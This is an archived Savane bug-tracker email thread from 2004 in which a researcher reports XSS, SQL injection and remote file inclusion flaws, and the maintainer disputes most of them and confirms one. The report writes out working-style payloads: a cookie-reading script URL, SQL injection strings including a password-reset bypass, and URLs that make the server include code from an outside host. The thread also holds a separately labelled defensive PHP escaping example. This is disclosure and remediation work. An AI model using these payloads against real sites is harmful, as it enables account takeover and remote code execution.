This mail is an automated notification from the bugs tracker
of the project: Savane.
/**************************************************************************/
[bugs #724] Latest Modifications:
Changes by:
Mathieu Roy <[EMAIL PROTECTED]>
Date:
Sat 18.09.2004 at 08:22 (Europe/Paris)
What | Removed | Added
---------------------------------------------------------------------------
Resolution | None | Fixed
Privacy | Private | Public
Status | Open | Closed
Release | 1.0.3 | > 1.0.4
Summary | Multiple vulnerabilities in Savane Product | vulnerability in
frontend/php/include/stats_functions.php
------------------ Additional Follow-up Comments ----------------------------
"This works but only if magic_quotes_gpc is set to Off."
Yes, but PHP shipped with magic_quotes_gpc set to off by all major GNU/Linux
distributors, and for good reason.
If you want to avoid that, before any SQL command, you are forced to make a test on
magic_quotes_gpc presence, and use addslashes if missing, because addslashes is dumb
enough to escape escaped characters.
I'd say it's just PHP bad design here. And well, this problem applies to any PHP
software.
"Sorry, I don't want to bother."
You don't have to. We are glad that you found out that an old and useless file could be
exploited maliciously. Now, we're one week before the 1.0.4 release and major sites
running Savane have been warned, so I guess there's no real need for a 1.0.3.1
release.
I'll close this item and post a news item.
Thanks for your contribution.
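As an added illustration (not Savane's own code, and not part of the original tracker comment), here is the magic_quotes_gpc-aware escaping the comment above describes, next to the prepared-statement form that makes the setting irrelevant. The table and column names are assumptions, not Savane's schema.

```php
<?php
// Added illustration, not Savane's own code: escape a request value exactly once,
// whatever magic_quotes_gpc is set to, then the prepared-statement alternative.
// Table and column names are assumptions, not Savane's schema.

// magic_quotes_gpc=On means PHP has already run addslashes() over every GET, POST
// and COOKIE value; escaping it again would escape the backslashes just inserted.
// Undo that first so the value is raw whatever the setting. get_magic_quotes_gpc()
// was removed in PHP 8.0 (it always returned false from 5.4 on); the
// function_exists() guard keeps this runnable on later versions.
function raw_request_value($value) {
    if (function_exists('get_magic_quotes_gpc') && get_magic_quotes_gpc()) {
        return stripslashes($value);
    }
    return $value;
}

// Escape exactly once for use as a single-quoted SQL string literal.
// mysqli_real_escape_string() is connection-aware (charset), unlike addslashes().
function sql_quote(mysqli $db, $value) {
    return "'" . mysqli_real_escape_string($db, raw_request_value($value)) . "'";
}

// A lookup in the style of the confirm_hash check discussed in the thread.
// For the reported value  ' or 1=1 limit 1--  the literal becomes
// '\' or 1=1 limit 1--', so the quote stays inside the string.
function find_user_by_confirm_hash(mysqli $db, $confirm_hash) {
    $sql = "SELECT user_id FROM user WHERE confirm_hash = "
         . sql_quote($db, $confirm_hash);
    return mysqli_query($db, $sql);
}

// The same lookup as a prepared statement: the value is sent as data, never as
// SQL text, so neither magic_quotes_gpc nor addslashes() changes the outcome.
function find_user_by_confirm_hash_prepared(mysqli $db, $confirm_hash) {
    $stmt = $db->prepare('SELECT user_id FROM user WHERE confirm_hash = ?');
    $hash = raw_request_value($confirm_hash);   // still undo magic quotes on the data
    $stmt->bind_param('s', $hash);
    $stmt->execute();
    return $stmt->get_result();
}
```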
/**************************************************************************/
[bugs #724] Full Item Snapshot:
URL: <http://gna.org/bugs/?func=detailitem&item_id=724>
Project: Savane
Submitted by: Joxean Koret
On: Thu 16.09.2004 at 23:53
Category: Web Frontend
Severity: 6 - Security
Priority: C - Normal
Resolution: Fixed
Privacy: Public
Assigned to: yeupou
Status: Closed
Release: > 1.0.4
Planned Release:
Summary: vulnerability in frontend/php/include/stats_functions.php
Original Submission:
---------------------------------------------------------------------------
Multiple Vulnerabilities in Savane
---------------------------------------------------------------------------
Author: Jose Antonio Coret (Joxean Koret)
Date: 2004
Location: Basque Country
---------------------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Savane Latest (Released at 24-Aug-2004 08:23)
Savane is a Web-based Libre Software hosting system. It currently includes
issue tracking (bugs, task, support), project and member management, mailing
lists, and individual account maintenance.
Web : https://gna.org/projects/savane
---------------------------------------------------------------------------
Vulnerabilities:
~~~~~~~~~~~~~~~~
A. Cross Site Scripting
A1. I have found a Cross Site Scripting vulnerability in the PHP login form.
To try the vulnerability you can view the following URL :
http(s)://<site-with-savane>/account/login.php?form_loginname="><script>alert(document.cookie)</script>
B. SQL Injection Vulnerabilities
B1. I have found various SQL Injection vulnerabilities. The Savane product is only
affected if :
A) The environment variable SV_LOCAL_INC_PREFIX is defined
and
B) PHP is configured with "magic_quotes_gpc" to "On"
and
C) The register_globals directive is set to on in the file php.ini
The following PHP scripts are vulnerable:
http://localhost/savane/account/updateprefs.php?form_use_cvsadmin=SQL_INJECTION
http://localhost/savane/account/pending-resend.php?form_use_cvsadmin=SQL_INJECTION
http://localhost/savane/account/lostpw-confirm.php?form_loginname=SQL_Injection
http://localhost/savane/account/logout.php?session_hash=SQLInjection
http://localhost/savane/account/login.php?user_id=SQLINJECTION&session_hash=SQLINJECTION
C. Remote Code Execution
C1. The first remote PHP code execution vulnerability that I found is only
exploitable if magic_quotes_gpc is set to on. To try this :
http://localhost/savane/include/stats_function.php?sys_urlroot=http://fuckingsite.com?
I have found various other vulnerabilities of the same kind, but they are only
exploitable if the SV_LOCAL_INC_PREFIX environment variable is defined (always)
and register_globals is set to on.
Examples:
http://localhost/savane/include/pre.php?sys_urlroot=http://fuckingsite.com?
http://localhost/savane/account/lostlogin.php?sys_urlroot=http://fuckingsite.com?
Disclaimer:
~~~~~~~~~~~
The information in this advisory and any of its demonstrations is provided
"as is" without any warranty of any kind.
I am not liable for any direct or indirect damages caused as a result of
using the information or demonstrations provided in any part of this
advisory.
---------------------------------------------------------------------------
Contact:
~~~~~~~~
Joxean Koret at joxeanpiti<<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es
Comments
------------------
-------------------------------------------------------
Date: Sat 18.09.2004 at 08:22 By: Mathieu Roy <yeupou>
"This works but only if magic_quotes_gpc is set to Off."
Yes, but PHP shipped with magic_quotes_gpc set to off by all major GNU/Linux
distributors, and for good reason.
If you want to avoid that, before any SQL command, you are forced to make a test on
magic_quotes_gpc presence, and use addslashes if missing, because addslashes is dumb
enough to escape escaped characters.
I'd say it's just PHP bad design here. And well, this problem applies to any PHP
software.
"Sorry, I don't want to bother."
You don't have to. We are glad that you found out that an old and useless file could be
exploited maliciously. Now, we're one week before the 1.0.4 release and major sites
running Savane have been warned, so I guess there's no real need for a 1.0.3.1
release.
I'll close this item and post a news item.
Thanks for your contribution.
-------------------------------------------------------
Date: Sat 18.09.2004 at 01:53 By: Joxean Koret <joseanpiti>
>------------------------------------------------------------------------
>Study of "Multiple vulnerabilities in Savane Product"
>------------------------------------------------------------------------
>
> >A. Cross Site Scripting
> >
> >A1. I have found a Cross Site Scripting vulnerability in the PHP login form.
> > To try the vulnerability you can view the following URL :
>
> >I do not call that vulnerability. To do so, someone needs first to be able to forge
> >a URL. If he can forge a URL, he does not need a Savane running to print
> >javascript.
Maybe not a vulnerability, but this is dangerous. Yes, it is needed to forge a URL,
but I think that it may be dangerous.
>
> ------------------------------------------------------------------------
>
> > B. SQL Injection Vulnerabilities
> > http://localhost/savane/account/updateprefs.php?form_use_cvsadmin=SQL_INJECTION
>
> I tried, it does not work at all.
> How could it work? In this case, the variable is only used in an if statement.
>
This doesn't work, sorry. I don't know what I have done...
> > B. SQL Injection Vulnerabilities
> > http://localhost/savane/account/login.php?user_id=SQLINJECTION&session_hash=SQLINJECTION
>
> I also tried, it did not work either.
> (PHP escapes ', so you cannot do injection)
>
This works but only if magic_quotes_gpc is set to Off.
> I did not check the others, I guess it's similar.
>
Take a look at the following:
Only if magic_quotes_gpc is set to Off:
http://localhost/savannah/account/lostlogin.php?confirm_hash='%20or%201=1%20limit%201--
Only in conjunction with the prior bug:
http://localhost/savannah/account/lostlogin.php?confirm_hash='%20or%20user_id=known_user%20limit%201--&form_pw=1&form_pw2=1&Update=1
http://localhost/savannah/account/pending-resend.php?form_user='%20or%202>1
This works, at least, in my system.
>
> ------------------------------------------------------------------------
>
> > C. Remote Code Execution
> > http://localhost/savane/include/stats_function.php?sys_urlroot=http://fuckingsite.com?
>
> This is confirmed. Workaround: remove the file. It's not used in the code at all.
> > C. Remote Code Execution
> >
>
> This cannot work. $sys_urlroot is set by the configuration file, so if you
> fill it, it will be overridden in any case by
> require getenv('SV_LOCAL_INC_PREFIX').'/savannah.conf.php';
>
> > C. Remote Code Execution
> >
>
> This cannot work. pre.php is called before
> require $GLOBALS['sys_urlroot']."/include/account.php";
> which means $GLOBALS['sys_urlroot'] will be set according to the configuration
> file.
>
You're right, only the problem in stats_function.php works.
Again, sorry, I don't know how I have been confused.
> ----------------------------------------------
>
> I'd like an exhaustive list of other Remote Code Execution vulnerabilities you think
> you found.
>
I tried and it doesn't work.
> I have run grep "require " on the whole frontend code and no require using a global
> to set the path exists without a previous require of "pre.php", setting the
> paths appropriately.
>
> I'm also a bit surprised that you always recall that "the SV_LOCAL_INC_PREFIX
> environment variable" must be defined, since with the version of Savane you tried,
> the PHP frontend would not run if it's not set.
>
My system was badly configured.
> I wait for the list of other files affected according to you. At the end of the day,
> I will release Savane 1.0.3.2 (removal of the useless and insecure stats_function.php).
Sorry, I don't want to bother.
-------------------------------------------------------
Date: Fri 17.09.2004 at 09:25 By: Mathieu Roy <yeupou>
Study of "Multiple vulnerabilities in Savane Product"
------------------------------------------------------------------------
>A. Cross Site Scripting
>
>A1. I have found a Cross Site Scripting vulnerability in the PHP login form.
> To try the vulnerability you can view the following URL :
I do not call that vulnerability. To do so, someone needs first to be able to forge a
URL. If he can forge a URL, he does not need a Savane running to print javascript.
------------------------------------------------------------------------
> B. SQL Injection Vulnerabilities
> http://localhost/savane/account/updateprefs.php?form_use_cvsadmin=SQL_INJECTION
I tried, it does not work at all.
How could it work? In this case, the variable is only used in an if statement.
> B. SQL Injection Vulnerabilities
> http://localhost/savane/account/login.php?user_id=SQLINJECTION&session_hash=SQLINJECTION
I also tried, it did not work either.
(PHP escapes ', so you cannot do injection)
I did not check the others, I guess it's similar.
------------------------------------------------------------------------
> C. Remote Code Execution
> http://localhost/savane/include/stats_function.php?sys_urlroot=http://fuckingsite.com?
This is confirmed. Workaround: remove the file. It's not used in the code at all.
> C. Remote Code Execution
>http://localhost/savane/include/pre.php?sys_urlroot=http://fuckingsite.com
This cannot work. $sys_urlroot is set by the configuration file, so if you
fill it, it will be overridden in any case by
require getenv('SV_LOCAL_INC_PREFIX').'/savannah.conf.php';
> C. Remote Code Execution
>http://localhost/savane/account/lostlogin.php?sys_urlroot=http://fuckingsite.com
This cannot work. pre.php is called before
require $GLOBALS['sys_urlroot']."/include/account.php";
which means $GLOBALS['sys_urlroot'] will be set according to the configuration file.
----------------------------------------------
I'd like an exhaustive list of other Remote Code Execution vulnerabilities you think
you found.
I have run grep "require " on the whole frontend code and no require using a global
to set the path exists without a previous require of "pre.php", setting the
paths appropriately.
I'm also a bit surprised that you always recall that "the SV_LOCAL_INC_PREFIX
environment variable" must be defined, since with the version of Savane you tried, the
PHP frontend would not run if it's not set.
I wait for the list of other files affected according to you. At the end of the day, I
will release Savane 1.0.3.2 (removal of the useless and insecure stats_function.php).
CC List
-------
CC Address | Comment
------------------------------------+-----------------------------
ype |
beuc --à-- gnu --POINT-- org | I think that you need to be advised.
For detailed info, follow this link:
<http://gna.org/bugs/?func=detailitem&item_id=724>
_______________________________________________
Message posted via Gna!
http://gna.org/
_______________________________________________
Savane-dev mailing list
[EMAIL PROTECTED]
https://mail.gna.org/listinfo/savane-dev